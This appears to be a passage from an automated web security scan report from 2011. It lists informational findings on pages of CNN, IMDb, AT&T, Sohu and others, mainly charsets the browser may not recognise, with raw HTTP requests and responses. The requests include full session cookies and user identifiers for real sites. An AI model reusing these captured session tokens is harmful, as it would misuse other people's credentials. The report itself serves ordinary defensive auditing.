Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:16 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:49 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 2271
Connection: close

<html>
<head>
<script type="text/javascript">
var coreDocDomain='';
if(location.hostname.indexOf('cnn.com')>0) { coreDocDomain='cnn.com'; }

...[SNIP]...

18.79. http://www.cnn.com/.element/ssi/www/breaking_news/3.0/banner.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/www/breaking_news/3.0/banner.html

Request

GET /.element/ssi/www/breaking_news/3.0/banner.html?&csiID=csi1 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CG=US:--:--

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:44:56 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=30, private, private
Expires: Mon, 15 Aug 2011 18:45:20 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 401
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html><head><script>var cnnDocDomain='';
if(location.hostname.indexOf('cnn.com')>0) { cnnDocDomain='cnn.com'; }
if(location.hostname.in
...[SNIP]...

18.80. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

Request

GET /images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; cs=fk/1slmnCWROKLucXD2/yQmPkiSO2RISy93xVI2aRvKt6pe36I4ChD7ZEhO2uZqUjbpRBA3qUReuegEXntkSFCmZUgSO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=; __utma=168836921.779117687.1313426596.1313426596.1313432700.2; __utmb=168836921.0.10.1313432700; __utmc=168836921; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc1%3Bs%3Dc12%3Bs%3Dc17%3Bs%3Dc4%3B
If-None-Match: "b6-4aa4847741600"
If-Modified-Since: Fri, 12 Aug 2011 05:35:20 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:49 GMT
Server: Server
Last-Modified: Fri, 12 Aug 2011 05:35:20 GMT
ETag: "b6-47741600"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 14 Aug 2012 18:48:50 GMT
Cneonction: close
Content-Type: text/html
Vary: Accept-Encoding
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 182

<html><head>
<style>body{ background:transparent; }</style>
</head><body>
<script type="text/javascript">parent.ad_utils.render_ad(document, window);</script>
</body></html>

18.81. http://www.imdb.com/tv/widget/grid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /tv/widget/grid

Request

GET /tv/widget/grid?context=rhs_tv_widget&show_episode=1 HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-id=566-3426531-3253648; session-id-time=1471106531; uu=BCYi7R4nLigv6I99LFBjSIAuEddX-KoeNGrGwEyY3WLQG62GqVCzq3wtfNa--fIIlQS89mwCuhGENBF4itU92DAVM_GAGwBP5lNi1BDuS0a5lpoVlWYteWxx3KI0-4AEyUS59gqLYZTSDynEXEgu3CGNTBK5Onalb_6-mCZkE0o80JAHzCmRzqHGO53KGIQd_37YoDNPUPJK052tfjxJd7T6ueGjV3HdByAliaGCLnQJsgzuhhgsVYxeGebYAciXWo3ZULP-6AeTuOIASfVQ0SYYgu6pk8iC7JncA19rxzzNZj1ceE9keGergJpspPQ8PR_O; __utma=168836921.779117687.1313426596.1313426596.1313426596.1; __utmz=168836921.1313426596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cs=Hmt+tyNJuDdEdOWWQN1wNAbGfbqgkW2NmMHlGqPyXoojoi6JgDJ+ibCRbYoGES2aoJFb/fPXTbqjhMntt9HNyTCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==; us=s%3D1009%3Bs%3D32%3Bs%3Dc5%3Bs%3Dc4%3Bs%3Dc17%3Bs%3Dc4%3Bs%3Dc12%3Bs%3Dc1%3B

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:02 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: cs=FJ6+Vfy70D/Z45zlX+GrcwiOAiSO2RITtqma5I26UQQN6lEXrnoBF57ZEhQoWVIEjtkkY9oeAiSISmaH3b/xMimZspfO2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Tue, 16 Aug 2011 07:00:00 GMT;path=/;domain=.imdb.com
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Vary: User-Agent
Content-Length: 6412

<a name="grid_start" id="grid_start" ref="2011-08-15/2000/Mon. Aug. 15"></a>
<div class="tv_grid">
<div class="tv_channels">
<div id="row_0" onmouseover="if (typeof(imdb_tv_widget_init)!='undefined'){
...[SNIP]...

18.82. http://www.tudou.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /

Request

GET / HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:55:46 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:53:30 GMT
Content-Length: 247630
Expires: Mon, 15 Aug 2011 19:02:36 GMT
Cache-Control: max-age=420
Vary: Accept-Encoding
Age: 10
X-Cache: HIT from www.tudou.com

<!DOCTYPE html>
<html>
<head>
<meta charset="gbk"/>

<title>......_...................._............,............,............</title>
<meta name="Keywords" content="......,....,....,........,...
...[SNIP]...

18.83. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

Request

GET /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 09 Aug 2011 22:05:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 6614
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: TLTHID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTSID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTUID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:20 GMT
Set-Cookie: BIGipServerpWL_7010_7011=248631687.25115.0000; path=/

GIF89a_...................................l..............=;;pw.ECB...............JKL-+)QRT...............R]/.....422,.....%#"=Js\\].........cbd...zzy.........srr...............lji......X......
   ...`
...[SNIP]...

18.84. http://www.wireless.att.com/navservice/navservlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /navservice/navservlet

Request

GET /navservice/navservlet?locale=en_US HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; fsr.a=1313432472423; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%7D%7D; __utmc=241758596

Response

HTTP/1.1 200 OK
Server: Apache
Access-Control-Allow-Origin: *
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 79130
Date: Mon, 15 Aug 2011 18:20:16 GMT
Connection: close

[{"id":"p2001","url":"http://www.att.com/shop/index.jsp","displayName":
"SHOP","code":"010000","isHead":false,"image":"","windowLocation":"N",
"specialTreatment":"","advanced":"","actionType":
...[SNIP]...

18.85. http://www.zedo.com/shared/commonHeader.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zedo.com
Path:   /shared/commonHeader.htm

Request

GET /shared/commonHeader.htm?pg= HTTP/1.1
Host: www.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 11 Jul 2011 09:01:30 GMT
ETag: "163612f-79d3-4a7c76dd74e80"
Vary: Accept-Encoding
Server: ZEDO 3G
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 31187
Cache-Control: max-age=1869098
Expires: Tue, 06 Sep 2011 10:07:14 GMT
Date: Mon, 15 Aug 2011 18:55:36 GMT
Connection: close

<link rel="stylesheet" href="http://www.zedo.com/shared/brochure.css" type="text/css">
<link rel="stylesheet" href="http://www.zedo.com/shared/tabs.css" type="text/css">
<SCRIPT LANGUAGE="JavaScript"
...[SNIP]...

18.86. http://wzus1.ask.com/i/b.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/b.html

Request

GET /i/b.html?t=a&d=us&s=a&c=a&app=a14&ti=1&ai=53221&l=dir&o=0&sv=0a5c406f&ip=32177b6a&cu.wz=0&u=&rnd=0.6893312251195312 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:26:55 GMT
Pragma: no-cache
Expires: Tue, 31 Dec 1996 23:59:59 GMT
Cache-Control: no-cache
Whatzup: 5.1.0/5.1.0-13
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/html

<html>
<head><title>b.html</title>
</head>
<body>Success</body>
</html>

19. HTML uses unrecognised charset  previous  next
There are 11 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


19.1. http://count36.51yes.com/click.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://count36.51yes.com
Path:   /click.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /click.aspx?id=360217262&logo=12 HTTP/1.1
Host: count36.51yes.com
Proxy-Connection: keep-alive
Referer: http://lifeng.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 1694


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var
...[SNIP]...

19.2. http://custom.exoclick.com/xhamster-945x100.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://custom.exoclick.com
Path:   /xhamster-945x100.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /xhamster-945x100.php HTTP/1.1
Host: custom.exoclick.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:55 GMT
Content-Type: text/html; charset=UTF8
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Content-Length: 588

<html>
<body style="margin: 0px">

<SCRIPT Language="JavaScript">

var dt=new Date().getTime();
document.write('<iframe style="border: 0px solid #000000;" frameborder="0" scrolling="no" width="945" he
...[SNIP]...

19.3. http://images.sohu.com/bill/s2011/hailiu/huyi/aili/0815/index.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://images.sohu.com
Path:   /bill/s2011/hailiu/huyi/aili/0815/index.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /bill/s2011/hailiu/huyi/aili/0815/index.html HTTP/1.1
Host: images.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:22:00 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 15 Aug 2011 18:27:00 GMT
Last-Modified: Mon, 15 Aug 2011 09:33:37 GMT
Content-Length: 7677
FSS-Cache: HIT from 8199042.15014796.8924138
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base target="_blank" />
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
...[SNIP]...

19.4. http://lifeng.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://lifeng.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
Host: lifeng.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCTBBRAT=BCGNEBKAHHHGMAOCEIGMIOIE

Response

HTTP/1.1 404 Not Found
Content-Length: 3879
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:51:53 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<head>
<style> a:link            {font:9pt/11pt ....; color:FF0000} a:visited        {font:9pt/11pt ....; color:#4e4e4e}
</style>

<META
...[SNIP]...
</title>

<META HTTP-EQUIV="Content-Type" Content="text-html; charset=gb2312">
<META NAME="MS.LOCALE" CONTENT="ZH-CN">
...[SNIP]...

19.5. http://news.sohu.com/s2011/dajijiamao/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://news.sohu.com
Path:   /s2011/dajijiamao/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /s2011/dajijiamao/ HTTP/1.1
Host: news.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:24:35 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:26:35 GMT
Last-Modified: Thu, 04 Aug 2011 23:20:00 GMT
Content-Length: 1514
FSS-Cache: EXPIRED from 9509782.17636256.10234898


<html>
<head>
<meta http-equiv=content-type content="text/html; charset=GBK">
<script src="http://www.sohu.com/sohuflash_1.js" type=text/javascript></script>
<meta http-equiv="
...[SNIP]...

19.6. http://news.soso.com/n.q  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://news.soso.com
Path:   /n.q

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /n.q?w=xss&pid=n.res.time.m&ty=c&sd=3&st=r HTTP/1.1
Host: news.soso.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_flv=10.3 r183; ip=0; cookie=0; name=12612374529663113019270038729854; querytext=xss; pid=web.cf; pgv_pvid=9085923014; pgv_info=pgvReferrer=&ssid=s8020529487; __utma=169109310.1703238222.1313432881.1313432881.1313432881.1; __utmb=169109310.1.10.1313432881; __utmc=169109310; __utmz=169109310.1313432881.1.1.utmcsr=soso.com|utmccn=(referral)|utmcmd=referral|utmcct=/q

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:35:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: max-age=0
Expires: Mon, 15 Aug 2011 18:35:18 GMT
Vary: Accept-Encoding
Content-Length: 24733

<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=gb2312" />
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <title>xss - ........</title>
       <
...[SNIP]...

19.7. http://v2.tudou.com/tdct/commonadv.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://v2.tudou.com
Path:   /tdct/commonadv.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /tdct/commonadv.html?date=8-15-13&jsoncallback=adExtension.callback&areaCode=0&positionId=4101 HTTP/1.1
Host: v2.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0
Vary: Accept-Encoding
Content-Type: text/html;charset=GBK
Date: Mon, 15 Aug 2011 18:56:09 GMT
X-Cache: MISS from adextensioncontrol.tudou.com
Content-Length: 77458

adExtension.callback({"mulSel":[],"commonAdvReturnEntityList":[{"textContent":"","isMulSel":0,"seedFlashTitle":"","ownerId":"100203","thirdPartClick":"","specialTime":0,"mustShowFlag":0,"videoList":[{
...[SNIP]...

19.8. http://www.ipraction.cn/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ipraction.cn
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: www.ipraction.cn
Proxy-Connection: keep-alive
Referer: http://news.sohu.com/s2011/dajijiamao/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
